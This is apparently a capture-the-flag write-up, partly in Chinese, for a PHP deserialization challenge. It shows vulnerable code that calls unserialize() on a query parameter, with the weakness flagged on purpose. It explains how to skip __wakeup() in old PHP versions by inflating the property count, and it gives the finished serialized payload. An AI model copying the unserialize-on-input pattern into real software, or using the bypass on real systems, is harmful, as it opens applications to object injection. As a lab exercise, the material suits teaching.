<?php
// Declare the response as UTF-8 HTML before any output is sent.
header('Content-type:text/html;charset=utf-8');

// Turn off all PHP error reporting, so notices and warnings raised further
// down (a missing query parameter, a malformed payload) never reach the page.
error_reporting(0);

// Print the syntax-highlighted source of class.php (presumably this very
// script, so that the player can read the challenge code; confirm).
highlight_file('class.php');
/**
 * Challenge class whose magic methods run automatically when an object is
 * created, rebuilt by unserialize(), and destroyed.
 *
 * The properties are public and untyped, so a serialized string can carry
 * any value for them.
 */
class HaHaHa
{
    /** Account name; the constructor sets it to "user". */
    public $admin;

    /** Password; __wakeup() replaces it with its SHA-1 hex digest. */
    public $passwd;

    /**
     * Runs on `new`: fills in the default, non-admin credentials.
     */
    public function __construct()
    {
        $this->admin = "user";
        $this->passwd = "123456";
    }

    /**
     * Runs when unserialize() rebuilds an object: overwrites the password
     * with its SHA-1 hex digest (40 hex characters), so the value checked in
     * __destruct() is no longer the one that was in the serialized string.
     */
    public function __wakeup()
    {
        $digest = sha1($this->passwd);
        $this->passwd = $digest;
    }

    /**
     * Runs when the object is destroyed.
     *
     * Prints $flag from flag.php only when admin is exactly "admin" and
     * passwd is exactly "wllm"; otherwise prints the current passwd followed
     * by "No wake up".
     */
    public function __destruct()
    {
        $nameMatches = $this->admin === "admin";
        $secretMatches = $this->passwd === "wllm";

        if (!$nameMatches || !$secretMatches) {
            echo $this->passwd;
            echo "No wake up";
            return;
        }

        // flag.php is expected to define $flag in this scope (file not shown).
        include("flag.php");
        echo $flag;
    }
}
// Take the `p` query parameter exactly as the client sent it; nothing is
// validated or filtered before it is used below.
$Letmeseesee = $_GET['p'];
// NOTE(review): unserialize() on request data lets the client pick the class
// and every property value of the rebuilt object, and that object's magic
// methods (__wakeup, __destruct) then run on those values. This is the
// weakness the exercise is built around. Outside a lab, decode client data
// with json_decode(), or at least pass ['allowed_classes' => false].
// The return value is not stored, so the rebuilt object is destroyed (and
// __destruct() runs) as soon as the call returns.
unserialize($Letmeseesee);
?>
这是一道简单的PHP反序列化题目。
代码中用到了3个魔术方法:
__construct(): //构造函数,当对象new的时候会自动调用
__destruct()://析构函数当对象被销毁时会被自动调用
__wakeup(): //unserialize()时会被自动调用
这里的__wakeup()会把passwd的值替换成它的sha1哈希(admin的值不会被改动),这样passwd就不可能再等于"wllm",所以考虑绕过这个函数。
<?php
/**
 * Local stand-in with the same class name and property names as the
 * challenge class, used only to produce a serialized string.
 *
 * It declares no magic methods, so serializing it runs no extra code.
 */
class HaHaHa
{
    /** Value the challenge's __destruct() compares against "admin". */
    public $admin = 'admin';

    /** Value the challenge's __destruct() compares against "wllm". */
    public $passwd = 'wllm';
}
// Build one instance and print its serialized form. The output records the
// class name, the number of properties (2 here) and each property name/value.
$sample = new HaHaHa();
$encoded = serialize($sample);
echo $encoded;
?>
要绕过__wakeup(),可以修改序列化字符串中表示对象属性个数的数值:当这个数值大于真实的属性个数时,__wakeup()不会被执行。上面的脚本输出的属性个数是2,这里把它改成3。注意这是旧版PHP中的一个缺陷,在已修复的PHP版本上这种绕过不再有效。
O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}